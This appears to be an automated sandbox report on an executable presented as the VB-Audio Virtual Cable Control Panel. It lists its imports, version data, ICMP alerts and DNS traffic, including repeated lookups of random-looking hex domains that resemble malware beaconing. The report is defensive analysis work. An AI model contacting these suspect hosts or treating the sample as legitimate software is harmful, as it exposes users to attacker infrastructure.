RT_VERSION	0xd1dd0	0x3c0	data	French	France
RT_MANIFEST	0xd2190	0x3ac	XML 1.0 document, ASCII text	French	France

Imports

DLL	Import
KERNEL32.dll	FlushFileBuffers, GetStringTypeW, GetStringTypeA, SetStdHandle, LoadLibraryA, GetOEMCP, GetACP, LCMapStringW, MultiByteToWideChar, GetCPInfo, SetFilePointer, WriteFile, TlsGetValue, SetLastError, DeviceIoControl, GetTickCount, CreateFileA, GetLastError, CreateMutexA, ReleaseMutex, WaitForSingleObject, CloseHandle, GetModuleHandleA, GetProcAddress, GetCurrentProcess, LCMapStringA, GetVersionExA, TlsAlloc, TlsSetValue, GetCurrentThreadId, GetFileType, GetStdHandle, HeapFree, HeapAlloc, HeapReAlloc, GetStartupInfoA, GetCommandLineA, GetVersion, ExitProcess, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InterlockedDecrement, InterlockedIncrement, GetModuleFileNameA, GetEnvironmentVariableA, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, RtlUnwind, TerminateProcess, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount
USER32.dll	GetMessageA, DispatchMessageA, TranslateMessage, LoadIconA, LoadCursorA, RegisterClassA, CreateWindowExA, ShowWindow, UpdateWindow, GetSystemMetrics, SetWindowPos, SetTimer, BeginPaint, EndPaint, KillTimer, PostQuitMessage, GetDC, ReleaseDC, DefWindowProcA, MessageBoxA, DrawTextA, LoadBitmapA, PostMessageA, SystemParametersInfoA
GDI32.dll	SetBkMode, SetTextColor, Rectangle, CreateCompatibleDC, SelectObject, GetObjectA, BitBlt, DeleteDC, DeleteObject, CreateFontIndirectA, CreateBrushIndirect, GetStockObject
ADVAPI32.dll	RegOpenKeyExA, RegCreateKeyExA, RegOpenKeyA, RegCreateKeyA, RegSetValueExA, RegCloseKey
SHELL32.dll	ShellExecuteA
SETUPAPI.dll	SetupDiGetClassDevsA, SetupDiEnumDeviceInterfaces, SetupDiGetDeviceInterfaceDetailA, SetupDiDestroyDeviceInfoList

Version Infos

Description	Data
LegalCopyright	V.Burel2012-2015
InternalName	VBCABLE_ControlPanel
FileVersion	1, 0, 3, 5
CompanyName	VB-AUDIO Software
Comments	VB-AUDIO Control Panel forVB-Audio Virtual Cable
ProductName	VBCABLE_ControlPanel
ProductVersion	1, 0, 3, 5
FileDescription	VB-AUDIO Virtual Cable Control Panel
OriginalFilename	VBCABLE_ControlPanel.exe
Translation	0x0000 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
French	France

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source IP	Dest IP
04/12/21-13:03:00.758135	ICMP	384	ICMP PING	192.168.2.6	205.185.216.42
04/12/21-13:03:00.793076	ICMP	449	ICMP Time-To-Live Exceeded in Transit	84.17.52.126	192.168.2.6
04/12/21-13:03:00.794144	ICMP	384	ICMP PING	192.168.2.6	205.185.216.42
04/12/21-13:03:00.829208	ICMP	449	ICMP Time-To-Live Exceeded in Transit	5.56.20.161	192.168.2.6
04/12/21-13:03:00.829596	ICMP	384	ICMP PING	192.168.2.6	205.185.216.42
04/12/21-13:03:00.877257	ICMP	449	ICMP Time-To-Live Exceeded in Transit	81.95.2.138	192.168.2.6
04/12/21-13:03:00.878848	ICMP	384	ICMP PING	192.168.2.6	205.185.216.42
04/12/21-13:03:00.931631	ICMP	449	ICMP Time-To-Live Exceeded in Transit	151.139.80.6	192.168.2.6
04/12/21-13:03:00.932046	ICMP	384	ICMP PING	192.168.2.6	205.185.216.42
04/12/21-13:03:00.981732	ICMP	449	ICMP Time-To-Live Exceeded in Transit	151.139.80.13	192.168.2.6
04/12/21-13:03:00.982232	ICMP	384	ICMP PING	192.168.2.6	205.185.216.42
04/12/21-13:03:01.032005	ICMP	408	ICMP Echo Reply	205.185.216.42	192.168.2.6

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 13:02:57.136909962 CEST	58377	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:02:57.168713093 CEST	55074	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:02:57.186321974 CEST	53	58377	8.8.8.8	192.168.2.6
Apr 12, 2021 13:02:57.229592085 CEST	53	55074	8.8.8.8	192.168.2.6
Apr 12, 2021 13:02:58.231462955 CEST	54513	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:02:58.279934883 CEST	53	54513	8.8.8.8	192.168.2.6
Apr 12, 2021 13:02:59.121067047 CEST	62044	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:02:59.170342922 CEST	53	62044	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:00.064244032 CEST	63791	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:00.114258051 CEST	53	63791	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:00.684736013 CEST	64267	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:00.697628021 CEST	49448	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:00.743732929 CEST	53	64267	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:00.756989002 CEST	53	49448	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:01.268578053 CEST	60342	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:01.328685999 CEST	53	60342	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:05.020802975 CEST	61346	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:05.085299015 CEST	53	61346	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:06.391015053 CEST	51774	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:06.439738035 CEST	53	51774	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:08.972621918 CEST	56023	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:09.021547079 CEST	53	56023	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:10.350749016 CEST	58384	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:10.402343988 CEST	53	58384	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:10.841862917 CEST	60261	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:10.990920067 CEST	53	60261	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:11.000909090 CEST	56061	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:11.073117971 CEST	53	56061	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:11.090610981 CEST	58336	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:11.268290997 CEST	53	58336	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:11.315761089 CEST	53781	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:11.393536091 CEST	53	53781	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:11.403877974 CEST	54064	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:11.477276087 CEST	53	54064	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:11.488459110 CEST	52811	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:11.564749002 CEST	53	52811	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:11.574331999 CEST	55299	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:11.743356943 CEST	53	55299	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:11.784915924 CEST	63745	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:11.846792936 CEST	53	63745	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:11.854188919 CEST	50055	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:11.930025101 CEST	53	50055	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:12.094336033 CEST	61374	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:12.271042109 CEST	53	61374	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:12.291918039 CEST	50339	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:12.363723040 CEST	53	50339	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:12.409718990 CEST	63307	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:12.481281996 CEST	53	63307	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:12.523664951 CEST	49694	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:12.605267048 CEST	53	49694	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:12.703941107 CEST	54982	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:12.790227890 CEST	53	54982	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:13.030762911 CEST	50010	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:13.091034889 CEST	53	50010	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:13.098697901 CEST	63718	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:13.155849934 CEST	53	63718	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:13.222284079 CEST	62116	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:13.273886919 CEST	53	62116	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:13.318120003 CEST	63816	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:13.375595093 CEST	53	63816	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:13.383250952 CEST	55014	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:13.460635900 CEST	53	55014	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:13.533027887 CEST	62208	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:13.595036983 CEST	53	62208	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:13.715596914 CEST	57574	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:13.804666042 CEST	53	57574	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:16.543703079 CEST	51818	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:16.693510056 CEST	53	51818	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:18.883424997 CEST	56628	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:18.962938070 CEST	53	56628	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:19.032450914 CEST	60778	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:19.094701052 CEST	53	60778	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:19.206955910 CEST	53799	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:19.283121109 CEST	53	53799	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:19.479945898 CEST	54683	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:19.540427923 CEST	53	54683	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:19.980892897 CEST	59329	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:20.052783966 CEST	53	59329	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:20.232626915 CEST	64021	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:20.292437077 CEST	53	64021	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:23.479829073 CEST	56129	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:23.554173946 CEST	53	56129	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:23.647763968 CEST	58177	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:23.707184076 CEST	53	58177	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:23.815805912 CEST	50700	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:23.892177105 CEST	53	50700	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:24.043111086 CEST	54069	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:24.118012905 CEST	53	54069	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:24.147711992 CEST	61178	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:24.224461079 CEST	53	61178	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:24.250355959 CEST	57017	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:24.299501896 CEST	53	57017	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:24.318134069 CEST	56327	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:24.375478983 CEST	53	56327	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:24.914566040 CEST	50243	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:24.975122929 CEST	53	50243	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:24.982626915 CEST	62055	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:25.056853056 CEST	53	62055	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:25.092700005 CEST	61249	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:25.158602953 CEST	53	61249	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:25.204273939 CEST	65252	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:25.261189938 CEST	53	65252	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:25.313347101 CEST	64367	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:25.374986887 CEST	53	64367	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:25.433950901 CEST	55066	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:25.441267967 CEST	60211	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:25.490122080 CEST	53	60211	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:25.491230011 CEST	53	55066	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:25.519424915 CEST	56570	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:25.580974102 CEST	53	56570	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:26.881007910 CEST	58454	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:26.934349060 CEST	53	58454	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:27.067282915 CEST	55180	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:27.127104044 CEST	53	55180	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:27.132898092 CEST	58721	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:27.195290089 CEST	53	58721	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:27.202928066 CEST	57691	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:27.259983063 CEST	53	57691	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:27.271294117 CEST	52943	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:27.328454971 CEST	53	52943	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:27.350861073 CEST	59489	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:27.412911892 CEST	53	59489	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:27.464390993 CEST	64022	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:27.523794889 CEST	53	64022	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:27.632875919 CEST	60023	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:27.690653086 CEST	53	60023	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:28.749053955 CEST	57193	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:28.797725916 CEST	53	57193	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:32.284576893 CEST	50248	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:32.341511011 CEST	53	50248	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:32.369936943 CEST	64413	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:32.427268028 CEST	53	64413	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:32.504468918 CEST	60429	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:32.594140053 CEST	53	60429	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:32.646763086 CEST	60345	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:32.695549965 CEST	53	60345	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:32.735975981 CEST	58730	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:32.796217918 CEST	53	58730	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:32.852586985 CEST	53830	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:32.914777040 CEST	53	53830	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:32.921643972 CEST	57226	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:32.983623981 CEST	53	57226	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:33.051158905 CEST	57880	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:33.132924080 CEST	53	57880	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:33.209146976 CEST	60850	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:33.268820047 CEST	53	60850	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:33.280750990 CEST	53187	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:33.342984915 CEST	53	53187	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:33.349498987 CEST	55830	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:33.406709909 CEST	53	55830	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:33.413965940 CEST	55145	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:33.471174955 CEST	53	55145	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:33.546457052 CEST	64091	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:33.606036901 CEST	53	64091	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:33.614715099 CEST	55728	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:33.672085047 CEST	53	55728	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:33.688853979 CEST	55694	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:33.741935968 CEST	53	55694	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:34.764062881 CEST	53926	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:34.821358919 CEST	53	53926	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:34.864597082 CEST	65531	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:34.923144102 CEST	53	65531	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:34.929876089 CEST	65437	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:34.990014076 CEST	53	65437	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:35.022841930 CEST	54590	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:35.072877884 CEST	53	54590	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:35.098217010 CEST	51318	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:35.146889925 CEST	53	51318	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:35.189290047 CEST	60888	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:35.238033056 CEST	53	60888	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:35.269690990 CEST	58474	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:35.318413973 CEST	53	58474	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:35.344116926 CEST	64575	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:35.405577898 CEST	53	64575	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:35.434082031 CEST	59092	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:35.491296053 CEST	53	59092	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:35.502551079 CEST	57483	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:35.563404083 CEST	53	57483	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:35.589879036 CEST	53830	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:35.651603937 CEST	53	53830	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:35.691437960 CEST	49809	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:35.740143061 CEST	53	49809	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:35.762669086 CEST	52814	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:35.821461916 CEST	53	52814	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:35.846787930 CEST	51069	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:35.907021046 CEST	53	51069	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:35.937725067 CEST	56526	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:35.997915030 CEST	53	56526	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:36.026412964 CEST	50512	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:36.076736927 CEST	53	50512	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:36.083726883 CEST	51679	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:36.142843962 CEST	53	51679	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:36.184247971 CEST	56071	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:36.241729021 CEST	53	56071	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:36.275032997 CEST	58950	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:36.335172892 CEST	53	58950	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:36.374141932 CEST	57035	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:36.427563906 CEST	53	57035	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:36.464217901 CEST	54122	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:36.521550894 CEST	53	54122	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:37.616827011 CEST	56759	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:37.674016953 CEST	53	56759	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:38.746007919 CEST	59220	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:38.803534985 CEST	53	59220	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:38.832190990 CEST	62211	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:38.882491112 CEST	53	62211	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:38.893923998 CEST	62033	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:38.944262028 CEST	53	62033	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:38.976767063 CEST	61244	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:39.034123898 CEST	53	61244	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:39.041210890 CEST	53696	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:39.098603964 CEST	53	53696	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:39.142802954 CEST	50733	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:39.202089071 CEST	53	50733	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:39.209203005 CEST	55770	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:39.268301964 CEST	53	55770	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:46.100287914 CEST	54525	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:46.161859989 CEST	53	54525	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:46.262140989 CEST	61760	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:46.319459915 CEST	53	61760	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:46.396337032 CEST	63822	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:46.461436987 CEST	53	63822	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:46.502969980 CEST	50957	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:46.562191010 CEST	53	50957	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:46.643312931 CEST	59666	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:46.694890022 CEST	53	59666	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:46.723298073 CEST	52223	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:46.774851084 CEST	53	52223	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:46.800092936 CEST	60136	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:46.850354910 CEST	53	60136	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:52.673238993 CEST	55649	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:52.722090006 CEST	53	55649	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:52.845650911 CEST	51524	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:52.894337893 CEST	53	51524	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:56.430430889 CEST	59141	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:56.482141972 CEST	53	59141	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 12, 2021 13:03:10.841862917 CEST	192.168.2.6	8.8.8.8	0xc69a	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.000909090 CEST	192.168.2.6	8.8.8.8	0x637e	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.090610981 CEST	192.168.2.6	8.8.8.8	0x830a	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.315761089 CEST	192.168.2.6	8.8.8.8	0x1409	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.403877974 CEST	192.168.2.6	8.8.8.8	0xeac9	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.488459110 CEST	192.168.2.6	8.8.8.8	0x6ee9	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.574331999 CEST	192.168.2.6	8.8.8.8	0x8e06	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.784915924 CEST	192.168.2.6	8.8.8.8	0xda7f	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.854188919 CEST	192.168.2.6	8.8.8.8	0x2af0	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:12.094336033 CEST	192.168.2.6	8.8.8.8	0x1d7e	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:12.291918039 CEST	192.168.2.6	8.8.8.8	0x884b	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:12.409718990 CEST	192.168.2.6	8.8.8.8	0x7f8e	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:12.523664951 CEST	192.168.2.6	8.8.8.8	0x2813	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:12.703941107 CEST	192.168.2.6	8.8.8.8	0xb9d0	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.030762911 CEST	192.168.2.6	8.8.8.8	0x57eb	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.098697901 CEST	192.168.2.6	8.8.8.8	0xf46a	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.222284079 CEST	192.168.2.6	8.8.8.8	0xc868	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.318120003 CEST	192.168.2.6	8.8.8.8	0x4896	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.383250952 CEST	192.168.2.6	8.8.8.8	0x9d22	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.533027887 CEST	192.168.2.6	8.8.8.8	0x7526	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:13.715596914 CEST	192.168.2.6	8.8.8.8	0xb91c	Standard query (0)	back19e64ea00d6ecfe1.io	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:16.543703079 CEST	192.168.2.6	8.8.8.8	0xf49d	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:18.883424997 CEST	192.168.2.6	8.8.8.8	0xa378	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:19.032450914 CEST	192.168.2.6	8.8.8.8	0x4880	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:19.206955910 CEST	192.168.2.6	8.8.8.8	0x244d	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:19.479945898 CEST	192.168.2.6	8.8.8.8	0x6b75	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:19.980892897 CEST	192.168.2.6	8.8.8.8	0xfb41	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
